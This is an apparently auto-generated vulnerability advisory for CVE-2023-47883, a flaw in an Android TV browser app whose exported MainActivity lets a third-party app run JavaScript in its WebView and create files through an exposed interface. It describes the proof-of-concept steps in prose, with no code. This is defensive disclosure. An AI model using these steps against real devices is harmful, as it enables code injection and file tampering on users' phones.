CVE-2023-47883
Description
The com.altamirano.fabricio.tvbrowser TV browser application through 4.5.1 for Android is vulnerable to JavaScript code execution via an explicit intent due to an exposed MainActivity.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
TVBrowser for Android 4.5.1 and earlier allows JavaScript code execution via an exported MainActivity, enabling remote attackers to inject malicious scripts and create arbitrary files.
Vulnerability
The TVBrowser application (com.altamirano.fabricio.tvbrowser) through version 4.5.1 exposes the MainActivity component, which is exported and can be invoked by third-party applications via explicit intents [2]. When a crafted URI containing JavaScript code is passed in the intent, it is loaded into the WebView, allowing arbitrary JavaScript execution [2]. Additionally, the WebView exposes JavaScript interfaces that can be abused for arbitrary file creation [2].
Exploitation
An attacker can launch the MainActivity by sending an explicit intent with a URI containing a JavaScript payload. The payload can call exposed JavaScript interfaces, such as Android.getBase64FromBlobData, to write arbitrary files (e.g., text or image files) to the device's storage [2]. No special permissions or user interaction beyond launching the app are required.
Impact
Successful exploitation allows an attacker to execute arbitrary JavaScript code in the WebView context and create arbitrary files on the device. This can lead to data exfiltration, defacement, or further compromise of the application's data and functionality [2].
Mitigation
As of version 5.0, the vulnerability remains unpatched according to the advisory [2]. Users are advised to avoid using the application until a fix is released. No official patch or workaround has been provided.
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- com.altamirano.fabricio/TV browser applicationdescription
- Range: <=4.5.1
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The exported MainActivity passes an attacker-controlled intent URI directly to a WebView without validation, enabling JavaScript code injection and arbitrary file creation via exposed JavaScript interfaces."
Attack vector
A remote attacker sends an explicit `Intent` with `Intent.ACTION_VIEW` targeting the exported `MainActivity` component. The intent's data URI is crafted as a `javascript:` URL containing arbitrary JavaScript code. When `MainActivity` receives this intent, the WebView executes the JavaScript, which can invoke exposed JavaScript interfaces (e.g., `Android.getBase64FromBlobData`) to create or overwrite files in the Downloads folder [ref_id=1]. No special permissions or user interaction beyond launching the app are required.
Affected code
The exported `com.altamirano.fabricio.tvbrowser.MainActivity` activity is the vulnerable component. The activity's WebView exposes JavaScript interfaces such as `Android.getBase64FromBlobData`, and the activity accepts an explicit `Intent` whose data URI is passed directly to the WebView [ref_id=1].
What the fix does
The advisory states that as of version 5.0 the vulnerability remains unpatched [ref_id=1]. The recommended remediation is to ensure activities are not unnecessarily exported, apply appropriate intent filters and permissions, and restrict JavaScript interfaces exposed by the WebView so they do not expose sensitive functionality to running JavaScript [ref_id=1]. No patch diff is available.
Preconditions
- configThe target device must have the com.altamirano.fabricio.tvbrowser app installed (version 4.5.1 or earlier)
- networkThe attacker must be able to send an explicit Intent to the exported MainActivity (e.g., from a malicious Android app installed on the same device)
- authNo user interaction is required beyond the victim having the app installed
Reproduction
The reference write-up provides a proof-of-concept. A malicious Android app constructs an `Intent` with `Intent.ACTION_VIEW`, sets the component to `com.altamirano.fabricio.tvbrowser/.MainActivity`, and sets the data URI to a `javascript:` URL that calls `window.Android.getBase64FromBlobData` with attacker-controlled base64 data and a filename. Calling `startActivity(intent)` launches the TV browser's `MainActivity`, which executes the JavaScript and creates the file [ref_id=1].
Generated on May 24, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3News mentions
0No linked articles in our index yet.